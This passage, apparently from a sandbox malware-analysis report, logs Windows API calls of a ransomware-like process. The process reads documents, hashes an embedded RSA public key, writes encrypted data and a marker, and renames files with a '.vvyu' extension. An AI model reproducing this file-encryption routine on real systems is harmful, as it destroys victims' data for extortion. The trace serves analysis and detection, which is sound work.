hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.329] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0193.330] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0a68*, nNumberOfBytesToWrite=0x18f8, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea0a68*, lpNumberOfBytesWritten=0x312fb14*=0x18f8, lpOverlapped=0x0) returned 1 [0193.330] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.330] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x18fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.330] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0193.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0193.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea0a68 [0193.331] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea0a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.331] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea0e98 [0193.331] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.332] WriteFile (in: hFile=0x568, lpBuffer=0x2ea0e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea0e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0193.332] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e98 | out: hHeap=0x620000) returned 1 [0193.332] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.332] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0193.332] CloseHandle (hObject=0x568) returned 1 [0193.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0193.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea0a68 [0193.334] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0193.334] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\4l3gkybFjpw5wc.rtf" (normalized: "c:\\users\\keecfmwgj\\documents\\4l3gkybfjpw5wc.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\4l3gkybFjpw5wc.rtf.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\4l3gkybfjpw5wc.rtf.vvyu")) returned 1 [0193.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.335] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0193.338] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26a5f650, ftCreationTime.dwHighDateTime=0x1d8a496, ftLastAccessTime.dwLowDateTime=0x68874390, ftLastAccessTime.dwHighDateTime=0x1d8a5ad, ftLastWriteTime.dwLowDateTime=0x68874390, ftLastWriteTime.dwHighDateTime=0x1d8a5ad, nFileSizeHigh=0x0, nFileSizeLow=0x11c2e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="567c.pdf", cAlternateFileName="")) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95800 [0193.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb4658 [0193.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95800 | out: hHeap=0x620000) returned 1 [0193.339] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\567c.pdf") returned=".pdf" [0193.339] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\567c.pdf" (normalized: "c:\\users\\keecfmwgj\\documents\\567c.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0193.341] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=72750) returned 1 [0193.341] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0193.344] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x11c08, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.344] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0193.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.346] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0193.346] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x11c2e, lpOverlapped=0x0) returned 1 [0193.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0193.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.347] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0193.347] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0193.348] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0193.348] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0193.348] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0193.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0193.349] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0193.349] GetLastError () returned 0x0 [0193.349] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0193.349] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0193.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0193.349] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0193.349] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0193.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.349] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0193.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0193.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0193.349] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c30) returned 0x2ea79b0 [0193.350] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0193.350] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0193.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0193.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0193.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0193.350] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95800 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93798 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95848 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937b0 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937f8 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0193.351] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0193.351] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea0a68 [0193.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.351] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0193.352] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0a68 | out: hHeap=0x620000) returned 1 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937f8 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c937e0 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0193.352] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0193.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0193.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.353] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0193.354] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0193.354] GetCurrentThreadId () returned 0x66c [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9ef90 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0193.354] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.355] GetCurrentThreadId () returned 0x66c [0193.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0193.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.355] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0193.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0193.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0193.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0193.356] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0193.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0193.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93840 [0193.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937e0 [0193.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0193.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0193.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0193.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0193.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937f8 [0193.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0193.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0193.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0193.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c937c8 [0193.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0193.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93858 [0193.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.358] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0193.358] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93828 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93810 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93870 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93810 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93828 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c937e0 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea0a68 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93840 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93870 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea0c78 [0193.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0193.359] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0193.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0193.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0193.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937e0 | out: hHeap=0x620000) returned 1 [0193.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea0e90 [0193.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0193.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0193.360] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0193.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0193.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0193.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0193.361] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0c78 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0e90 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93810 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0193.362] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93858 | out: hHeap=0x620000) returned 1 [0193.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0193.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937f8 | out: hHeap=0x620000) returned 1 [0193.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c937c8 | out: hHeap=0x620000) returned 1 [0193.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0193.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0193.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0193.364] HeapFree 